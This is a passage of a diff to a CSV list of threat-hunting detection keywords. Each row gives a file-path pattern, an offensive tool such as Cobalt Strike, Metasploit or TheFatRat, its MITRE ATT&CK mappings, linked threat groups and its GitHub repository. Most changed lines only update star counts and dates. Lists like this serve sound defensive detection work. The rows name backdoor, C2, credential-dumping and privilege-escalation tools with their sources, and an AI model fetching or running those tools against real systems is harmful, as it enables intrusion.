Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" "*/BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" "*/BackDoor*","offensive_tool_keyword","_","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*/backdoor/traitor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*/backdoor_all_users.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/backdoor_apk*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8267","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/backdoor/traitor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/backdoor_all_users.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/backdoor_apk*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" "*/backoff.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/backorifice-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/backorifice-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -2793,46 +2796,49 @@ "*/bashexplode/boko*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*/Bashfuscator*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*/Bates.csproj*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*/batik_svg*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/batik_svg*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/bazarloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/bbaranoff/CVE-2022-0847/*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*/beacon.h","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*/beacon_202_no_acl.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/beacon_257-objects.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/beacon_compatibility*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" -"*/beacon_compatibility.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*/beacon_compatibility.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*/beacon_funcs/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/beacon_health_check/*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*/beacon_http/*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/beacon_notify.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/beacon_notify.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/BeaconChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/beaconhealth.cna*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*/beacon-injection/*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/beacon-object-file*","offensive_tool_keyword","cobaltstrike","Cobaltstrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/realoriginal/beacon-object-file","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/BeaconTool.java*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 